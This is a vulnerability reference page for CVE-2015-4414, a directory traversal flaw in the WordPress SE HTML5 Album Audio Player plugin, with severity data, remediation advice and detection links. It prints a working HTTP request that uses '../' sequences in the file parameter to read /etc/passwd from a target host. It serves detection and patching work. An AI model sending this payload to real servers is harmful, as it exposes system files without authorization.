🔙 목록으로 돌아가기

CVE-2015-4414: WordPress SE HTML5 Album Audio Player 1.1.0 - Directory Traversal

TitleWordPress SE HTML5 Album Audio Player 1.1.0 - Directory Traversal
Authordaffainfo
SeverityMedium
ImpactAn attacker can exploit this vulnerability to access sensitive files on the server, potentially leading to unauthorized disclosure of sensitive information.
RemediationUpdate to the latest version of WordPress SE HTML5 Album Audio Player or apply the vendor-supplied patch to fix the directory traversal vulnerability.
CVSS Score5
EPSS Score0.09051
CVE IDCVE-2015-4414
CWE IDCWE-22
Tags cve2015 cve wordpress wp-plugin lfi edb packetstorm se_html5_album_audio_player_project vuln

🔍 Vulnerability Description

WordPress SE HTML5 Album Audio Player 1.1.0 contains a directory traversal vulnerability in download_audio.php that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.

🌐 HTTP Request

GET /wp-content/plugins/se-html5-album-audio-player/download_audio.php?file=/wp-content/uploads/../../../../../etc/passwd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:1.9.6.20) Gecko/ Firefox/12.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2015/CVE-2015-4414.yaml

🦈 Packet Capture: ⬇️ Download cve-2015-4414.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A